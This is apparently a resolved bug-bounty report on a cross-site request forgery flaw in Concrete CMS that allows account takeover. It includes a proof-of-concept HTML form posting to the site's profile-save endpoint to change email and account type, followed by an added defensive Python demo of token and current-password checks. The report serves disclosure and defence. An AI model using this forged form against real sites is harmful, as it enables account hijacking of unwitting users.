CSRF Full Account Takeover
Concrete CMS
Reported by
khalidamin
Vulnerability Details
Technical details and impact analysis
Try this code in your browser:
<html>
  <body>
    <form action="https://www.concrete5.org/profile/preferences/-/save/" method="POST">
      <input type="hidden" name="uName" value="██████" />
      <input type="hidden" name="uEmail" value="████" />
      <input type="hidden" name="uAccountType" value="owner" />
      <input type="hidden" name="profile_private_messages_notification_enabled" value="1" />
      <input type="hidden" name="uPasswordOld" value="" />
      <input type="hidden" name="uPasswordNew" value="" />
      <input type="hidden" name="uPasswordNewConfirm" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
You need to ask for the password to confirm settings changes, or use a token every time they are changed.
If any further information is needed, please ask.
Thanks.
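The two fixes the reporter asks for, a per-session CSRF token and a current-password check before credential changes, are shown below as an added example written for this page; it is not Concrete CMS code. The endpoint, the `ccm_token` field name, the server secret and the account record are all assumed or constructed for the demo. The `demo()` function replays a form with the same fields as the PoC above (no token, empty passwords) and shows it being rejected, then shows a token minted for a different session failing, a valid token still failing without the current password, and finally a legitimate change succeeding.

```python
import hashlib
import hmac
import secrets

# Constructed demo secret; a real deployment loads this from configuration.
SERVER_SECRET = b"demo-only-secret-do-not-reuse"
ACTION = "profile/preferences/save"   # assumed action label for the save handler
TOKEN_FIELD = "ccm_token"             # assumed form field name, not from the report


def issue_csrf_token(session_id: str, action: str = ACTION) -> str:
    """Synchronizer token bound to the user's session and to one action."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}|{action}|{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(token: str, session_id: str, action: str = ACTION) -> bool:
    """Recompute the MAC; a token minted for another session or action fails."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}|{action}|{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def save_preferences(session_id: str, form: dict, account: dict) -> dict:
    """Server-side save handler. Returns {"ok": bool, "error": str | None}."""
    # 1. The browser attaches session cookies to a cross-site POST, so the
    #    session alone proves nothing; the token must come from a page we served.
    if not verify_csrf_token(form.get(TOKEN_FIELD, ""), session_id):
        return {"ok": False, "error": "missing or invalid CSRF token"}
    # 2. Email and password changes additionally require the current password.
    wants_pw = bool(form.get("uPasswordNew"))
    wants_email = form.get("uEmail", account["email"]) != account["email"]
    if wants_pw or wants_email:
        supplied = hash_password(form.get("uPasswordOld", ""), account["salt"])
        if not hmac.compare_digest(supplied, account["password_hash"]):
            return {"ok": False, "error": "current password required"}
    if wants_pw and form["uPasswordNew"] != form.get("uPasswordNewConfirm"):
        return {"ok": False, "error": "new passwords do not match"}
    # 3. Privilege fields such as uAccountType are never read from the form.
    account["email"] = form.get("uEmail", account["email"])
    if wants_pw:
        account["password_hash"] = hash_password(form["uPasswordNew"], account["salt"])
    return {"ok": True, "error": None}


def demo() -> dict:
    """Replays the PoC-shaped form and three follow-ups; returns each outcome."""
    salt = b"constructed-salt"
    account = {"email": "victim@example.com", "salt": salt,
               "password_hash": hash_password("correct horse", salt)}
    session = "sess-victim"
    # Same field set as the report's form: no token, empty password fields.
    forged = {"uName": "attacker", "uEmail": "attacker@example.com",
              "uAccountType": "owner", "uPasswordOld": "",
              "uPasswordNew": "", "uPasswordNewConfirm": ""}
    results = {}
    results["forged"] = save_preferences(session, dict(forged), account)
    results["wrong_session"] = save_preferences(
        session, {**forged, TOKEN_FIELD: issue_csrf_token("sess-other")}, account)
    results["no_old_pw"] = save_preferences(
        session, {**forged, TOKEN_FIELD: issue_csrf_token(session)}, account)
    legit = {"uName": "victim", "uEmail": "new@example.com",
             TOKEN_FIELD: issue_csrf_token(session),
             "uPasswordOld": "correct horse",
             "uPasswordNew": "n3w-passphrase", "uPasswordNewConfirm": "n3w-passphrase"}
    results["legit"] = save_preferences(session, legit, account)
    results["email_after"] = account["email"]
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The token is bound to both the session and the action so that a token leaked from one form cannot be replayed against another, and `hmac.compare_digest` is used for every secret comparison. Note that the token check alone already defeats the cross-site form; the password check is the second layer the reporter recommends, covering the case where a token is leaked or a session is reused.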
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Cross-Site Request Forgery (CSRF)